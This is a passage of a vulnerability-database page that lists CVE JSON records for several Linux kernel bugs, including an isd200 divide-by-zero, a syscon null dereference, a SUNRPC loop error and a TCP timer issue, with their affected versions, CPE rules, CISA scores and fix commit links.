"url": "https://git.kernel.org/stable/c/f42ba916689f5c7b1642092266d2f53cf527aaaa"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/871fd7b10b56d280990b7e754f43d888382ca325"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3a67d4ab9e730361d183086dfb0ddd8c61f01636"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/014bcf41d946b36a8f0b8e9b5d9529efbb822f49"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/usb/storage/isd200.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "9968c701cba7eda42e5f0052b040349d6222ae34",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "eb7b01ca778170654e1c76950024270ba74b121f",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "284fb1003d5da111019b9e0bf99b084fd71ac133",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "6c1f36d92c0a8799569055012665d2bb066fb964",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "f42ba916689f5c7b1642092266d2f53cf527aaaa",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "871fd7b10b56d280990b7e754f43d888382ca325",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "3a67d4ab9e730361d183086dfb0ddd8c61f01636",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "014bcf41d946b36a8f0b8e9b5d9529efbb822f49",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/usb/storage/isd200.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.12"
},
{
"lessThan": "2.6.12",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.312",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.274",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.154",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.84",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.24",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.312",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.274",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.154",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.84",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.24",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.12",
"versionStartIncluding": "2.6.12",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "2.6.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nUSB: usb-storage: Prevent divide-by-0 error in isd200_ata_command\n\nThe isd200 sub-driver in usb-storage uses the HEADS and SECTORS values\nin the ATA ID information to calculate cylinder and head values when\ncreating a CDB for READ or WRITE commands. The calculation involves\ndivision and modulus operations, which will cause a crash if either of\nthese values is 0. While this never happens with a genuine device, it\ncould happen with a flawed or subversive emulation, as reported by the\nsyzbot fuzzer.\n\nProtect against this possibility by refusing to bind to the device if\neither the ATA_ID_HEADS or ATA_ID_SECTORS value in the device\u0027s ID\ninformation is 0. This requires isd200_Initialization() to return a\nnegative error code when initialization fails; currently it always\nreturns 0 (even when there is an error)."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:03:19.394Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/9968c701cba7eda42e5f0052b040349d6222ae34"
},
{
"url": "https://git.kernel.org/stable/c/eb7b01ca778170654e1c76950024270ba74b121f"
},
{
"url": "https://git.kernel.org/stable/c/284fb1003d5da111019b9e0bf99b084fd71ac133"
},
{
"url": "https://git.kernel.org/stable/c/6c1f36d92c0a8799569055012665d2bb066fb964"
},
{
"url": "https://git.kernel.org/stable/c/f42ba916689f5c7b1642092266d2f53cf527aaaa"
},
{
"url": "https://git.kernel.org/stable/c/871fd7b10b56d280990b7e754f43d888382ca325"
},
{
"url": "https://git.kernel.org/stable/c/3a67d4ab9e730361d183086dfb0ddd8c61f01636"
},
{
"url": "https://git.kernel.org/stable/c/014bcf41d946b36a8f0b8e9b5d9529efbb822f49"
}
],
"title": "USB: usb-storage: Prevent divide-by-0 error in isd200_ata_command",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-27059",
"datePublished": "2024-05-01T13:00:10.571Z",
"dateReserved": "2024-02-19T14:20:24.214Z",
"dateUpdated": "2025-05-04T09:03:19.394Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52467 (GCVE-0-2023-52467)
Vulnerability from cvelistv5
Published
2024-02-25 08:16
Modified
2025-05-04 07:37
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
mfd: syscon: Fix null pointer dereference in of_syscon_register()
kasprintf() returns a pointer to dynamically allocated memory
which can be NULL upon failure.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: e15d7f2b81d2e7d93115d46fa931b366c1cdebc2 Version: e15d7f2b81d2e7d93115d46fa931b366c1cdebc2 Version: e15d7f2b81d2e7d93115d46fa931b366c1cdebc2 Version: e15d7f2b81d2e7d93115d46fa931b366c1cdebc2 Version: e15d7f2b81d2e7d93115d46fa931b366c1cdebc2 Version: e15d7f2b81d2e7d93115d46fa931b366c1cdebc2 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:03:19.769Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/927626a2073887ee30ba00633260d4d203f8e875"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c3e3a2144bf50877551138ffce9f7aa6ddfe385b"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/527e8c5f3d00299822612c495d5adf1f8f43c001"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3ef1130deee98997275904d9bfc37af75e1e906c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7f2c410ac470959b88e03dadd94b7a0b71df7973"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/41673c66b3d0c09915698fec5c13b24336f18dd1"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52467",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:02:30.477926Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:46.138Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/mfd/syscon.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "927626a2073887ee30ba00633260d4d203f8e875",
"status": "affected",
"version": "e15d7f2b81d2e7d93115d46fa931b366c1cdebc2",
"versionType": "git"
},
{
"lessThan": "c3e3a2144bf50877551138ffce9f7aa6ddfe385b",
"status": "affected",
"version": "e15d7f2b81d2e7d93115d46fa931b366c1cdebc2",
"versionType": "git"
},
{
"lessThan": "527e8c5f3d00299822612c495d5adf1f8f43c001",
"status": "affected",
"version": "e15d7f2b81d2e7d93115d46fa931b366c1cdebc2",
"versionType": "git"
},
{
"lessThan": "3ef1130deee98997275904d9bfc37af75e1e906c",
"status": "affected",
"version": "e15d7f2b81d2e7d93115d46fa931b366c1cdebc2",
"versionType": "git"
},
{
"lessThan": "7f2c410ac470959b88e03dadd94b7a0b71df7973",
"status": "affected",
"version": "e15d7f2b81d2e7d93115d46fa931b366c1cdebc2",
"versionType": "git"
},
{
"lessThan": "41673c66b3d0c09915698fec5c13b24336f18dd1",
"status": "affected",
"version": "e15d7f2b81d2e7d93115d46fa931b366c1cdebc2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/mfd/syscon.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.9"
},
{
"lessThan": "5.9",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.209",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.148",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.75",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.14",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.209",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.148",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.75",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.14",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.2",
"versionStartIncluding": "5.9",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "5.9",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmfd: syscon: Fix null pointer dereference in of_syscon_register()\n\nkasprintf() returns a pointer to dynamically allocated memory\nwhich can be NULL upon failure."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:37:19.104Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/927626a2073887ee30ba00633260d4d203f8e875"
},
{
"url": "https://git.kernel.org/stable/c/c3e3a2144bf50877551138ffce9f7aa6ddfe385b"
},
{
"url": "https://git.kernel.org/stable/c/527e8c5f3d00299822612c495d5adf1f8f43c001"
},
{
"url": "https://git.kernel.org/stable/c/3ef1130deee98997275904d9bfc37af75e1e906c"
},
{
"url": "https://git.kernel.org/stable/c/7f2c410ac470959b88e03dadd94b7a0b71df7973"
},
{
"url": "https://git.kernel.org/stable/c/41673c66b3d0c09915698fec5c13b24336f18dd1"
}
],
"title": "mfd: syscon: Fix null pointer dereference in of_syscon_register()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52467",
"datePublished": "2024-02-25T08:16:31.745Z",
"dateReserved": "2024-02-20T12:30:33.297Z",
"dateUpdated": "2025-05-04T07:37:19.104Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-36288 (GCVE-0-2024-36288)
Vulnerability from cvelistv5
Published
2024-06-21 11:18
Modified
2025-11-04 17:21
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
SUNRPC: Fix loop termination condition in gss_free_in_token_pages()
The in_token->pages[] array is not NULL terminated. This results in
the following KASAN splat:
KASAN: maybe wild-memory-access in range [0x04a2013400000008-0x04a201340000000f]
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: ab8466d4e26806a4ae82c282762c4545eecf45ef Version: 4420b73c7f26fd5fcb37bbce5313dd356ef1b3ca Version: f148a95f68c66c1b097391b68e153d5a46f0e780 Version: fe0b474974fee7af1df286e0edd5a1460c811865 Version: c1d8c429e4d2ce85ec5c92cf71cb419baf75c56f Version: 8ca148915670a2921afcc255af9e1dc80f37b052 Version: bafa6b4d95d97877baa61883ff90f7e374427fae Version: a3c1afd5d7ad59e34a275d80c428952f83c8c1f0 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-36288",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-21T13:05:00.955390Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-21T13:05:08.602Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-11-04T17:21:10.146Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/57ff6c0a175930856213b2aa39f8c845a53e5b1c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6ed45d20d30005bed94c8c527ce51d5ad8121018"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4cefcd0af7458bdeff56a9d8dfc6868ce23d128a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b4878ea99f2b40ef1925720b1b4ca7f4af1ba785"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f9977e4e0cd98a5f06f2492b4f3547db58deabf5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/af628d43a822b78ad8d4a58d8259f8bf8bc71115"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0a1cb0c6102bb4fd310243588d39461da49497ad"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4a77c3dead97339478c7422eb07bf4bf63577008"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/sunrpc/auth_gss/svcauth_gss.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "57ff6c0a175930856213b2aa39f8c845a53e5b1c",
"status": "affected",
"version": "ab8466d4e26806a4ae82c282762c4545eecf45ef",
"versionType": "git"
},
{
"lessThan": "6ed45d20d30005bed94c8c527ce51d5ad8121018",
"status": "affected",
"version": "4420b73c7f26fd5fcb37bbce5313dd356ef1b3ca",
"versionType": "git"
},
{
"lessThan": "4cefcd0af7458bdeff56a9d8dfc6868ce23d128a",
"status": "affected",
"version": "f148a95f68c66c1b097391b68e153d5a46f0e780",
"versionType": "git"
},
{
"lessThan": "b4878ea99f2b40ef1925720b1b4ca7f4af1ba785",
"status": "affected",
"version": "fe0b474974fee7af1df286e0edd5a1460c811865",
"versionType": "git"
},
{
"lessThan": "af628d43a822b78ad8d4a58d8259f8bf8bc71115",
"status": "affected",
"version": "c1d8c429e4d2ce85ec5c92cf71cb419baf75c56f",
"versionType": "git"
},
{
"lessThan": "0a1cb0c6102bb4fd310243588d39461da49497ad",
"status": "affected",
"version": "8ca148915670a2921afcc255af9e1dc80f37b052",
"versionType": "git"
},
{
"lessThan": "4a77c3dead97339478c7422eb07bf4bf63577008",
"status": "affected",
"version": "bafa6b4d95d97877baa61883ff90f7e374427fae",
"versionType": "git"
},
{
"status": "affected",
"version": "a3c1afd5d7ad59e34a275d80c428952f83c8c1f0",
"versionType": "git"
}
]
},
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/sunrpc/auth_gss/svcauth_gss.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "6.9.4",
"status": "affected",
"version": "6.9.3",
"versionType": "semver"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.4",
"versionStartIncluding": "6.9.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "6.8.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nSUNRPC: Fix loop termination condition in gss_free_in_token_pages()\n\nThe in_token-\u003epages[] array is not NULL terminated. This results in\nthe following KASAN splat:\n\n KASAN: maybe wild-memory-access in range [0x04a2013400000008-0x04a201340000000f]"
}
],
"providerMetadata": {
"dateUpdated": "2025-06-19T12:39:18.733Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/57ff6c0a175930856213b2aa39f8c845a53e5b1c"
},
{
"url": "https://git.kernel.org/stable/c/6ed45d20d30005bed94c8c527ce51d5ad8121018"
},
{
"url": "https://git.kernel.org/stable/c/4cefcd0af7458bdeff56a9d8dfc6868ce23d128a"
},
{
"url": "https://git.kernel.org/stable/c/b4878ea99f2b40ef1925720b1b4ca7f4af1ba785"
},
{
"url": "https://git.kernel.org/stable/c/af628d43a822b78ad8d4a58d8259f8bf8bc71115"
},
{
"url": "https://git.kernel.org/stable/c/0a1cb0c6102bb4fd310243588d39461da49497ad"
},
{
"url": "https://git.kernel.org/stable/c/4a77c3dead97339478c7422eb07bf4bf63577008"
}
],
"title": "SUNRPC: Fix loop termination condition in gss_free_in_token_pages()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-36288",
"datePublished": "2024-06-21T11:18:46.152Z",
"dateReserved": "2024-06-21T11:16:40.621Z",
"dateUpdated": "2025-11-04T17:21:10.146Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-35910 (GCVE-0-2024-35910)
Vulnerability from cvelistv5
Published
2024-05-19 08:35
Modified
2025-05-04 09:08
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
tcp: properly terminate timers for kernel sockets
We had various syzbot reports about tcp timers firing after
the corresponding netns has been dismantled.
Fortunately Josef Bacik could trigger the issue more often,
and could test a patch I wrote two years ago.
When TCP sockets are closed, we call inet_csk_clear_xmit_timers()
to 'stop' the timers.
inet_csk_clear_xmit_timers() can be called from any context,
including when socket lock is held.
This is the reason it uses sk_stop_timer(), aka del_timer().
This means that ongoing timers might finish much later.
For user sockets, this is fine because each running timer
holds a reference on the socket, and the user socket holds
a reference on the netns.
For kernel sockets, we risk that the netns is freed before
timer can complete, because kernel sockets do not hold
reference on the netns.
This patch adds inet_csk_clear_xmit_timers_sync() function
that using sk_stop_timer_sync() to make sure all timers
are terminated before the kernel socket is released.
Modules using kernel sockets close them in their netns exit()
handler.
Also add sock_not_owned_by_me() helper to get LOCKDEP
support : inet_csk_clear_xmit_timers_sync() must not be called
while socket lock is held.
It is very possible we can revert in the future commit
3a58f13a881e ("net: rds: acquire refcount on TCP sockets")
which attempted to solve the issue in rds only.
(net/smc/af_smc.c and net/mptcp/subflow.c have similar code)
We probably can remove the check_net() tests from
tcp_out_of_resources() and __tcp_close() in the future.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 26abe14379f8e2fa3fd1bcf97c9a7ad9364886fe Version: 26abe14379f8e2fa3fd1bcf97c9a7ad9364886fe Version: 26abe14379f8e2fa3fd1bcf97c9a7ad9364886fe Version: 26abe14379f8e2fa3fd1bcf97c9a7ad9364886fe Version: 26abe14379f8e2fa3fd1bcf97c9a7ad9364886fe Version: 26abe14379f8e2fa3fd1bcf97c9a7ad9364886fe Version: 26abe14379f8e2fa3fd1bcf97c9a7ad9364886fe Version: 26abe14379f8e2fa3fd1bcf97c9a7ad9364886fe |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-35910",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-29T18:25:39.390284Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "CWE-noinfo Not enough information",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-10-29T19:44:27.885Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:21:48.925Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/93f0133b9d589cc6e865f254ad9be3e9d8133f50"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/44e62f5d35678686734afd47c6a421ad30772e7f"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e3e27d2b446deb1f643758a0c4731f5c22492810"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2e43d8eba6edd1cf05a3a20fdd77688fa7ec16a4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/91b243de910a9ac8476d40238ab3dbfeedd5b7de"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c1ae4d1e76eacddaacb958b67cd942082f800c87"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/899265c1389fe022802aae73dbf13ee08837a35a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/151c9c724d05d5b0dd8acd3e11cb69ef1f2dbada"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"include/net/inet_connection_sock.h",
"include/net/sock.h",
"net/ipv4/inet_connection_sock.c",
"net/ipv4/tcp.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "93f0133b9d589cc6e865f254ad9be3e9d8133f50",
"status": "affected",
"version": "26abe14379f8e2fa3fd1bcf97c9a7ad9364886fe",
"versionType": "git"
},
{
"lessThan": "44e62f5d35678686734afd47c6a421ad30772e7f",
"status": "affected",
"version": "26abe14379f8e2fa3fd1bcf97c9a7ad9364886fe",
"versionType": "git"
},
{
"lessThan": "e3e27d2b446deb1f643758a0c4731f5c22492810",
"status": "affected",
"version": "26abe14379f8e2fa3fd1bcf97c9a7ad9364886fe",
"versionType": "git"
},
{
"lessThan": "2e43d8eba6edd1cf05a3a20fdd77688fa7ec16a4",
"status": "affected",
"version": "26abe14379f8e2fa3fd1bcf97c9a7ad9364886fe",
"versionType": "git"
},
{
"lessThan": "91b243de910a9ac8476d40238ab3dbfeedd5b7de",
"status": "affected",
"version": "26abe14379f8e2fa3fd1bcf97c9a7ad9364886fe",
"versionType": "git"
},
{
"lessThan": "c1ae4d1e76eacddaacb958b67cd942082f800c87",
"status": "affected",
"version": "26abe14379f8e2fa3fd1bcf97c9a7ad9364886fe",
"versionType": "git"
},
{
"lessThan": "899265c1389fe022802aae73dbf13ee08837a35a",
"status": "affected",
"version": "26abe14379f8e2fa3fd1bcf97c9a7ad9364886fe",
"versionType": "git"
},
{
"lessThan": "151c9c724d05d5b0dd8acd3e11cb69ef1f2dbada",
"status": "affected",
"version": "26abe14379f8e2fa3fd1bcf97c9a7ad9364886fe",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"include/net/inet_connection_sock.h",
"include/net/sock.h",
"net/ipv4/inet_connection_sock.c",
"net/ipv4/tcp.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.2"
},
{
"lessThan": "4.2",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.312",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.274",
"versionType": "semver"
},
{
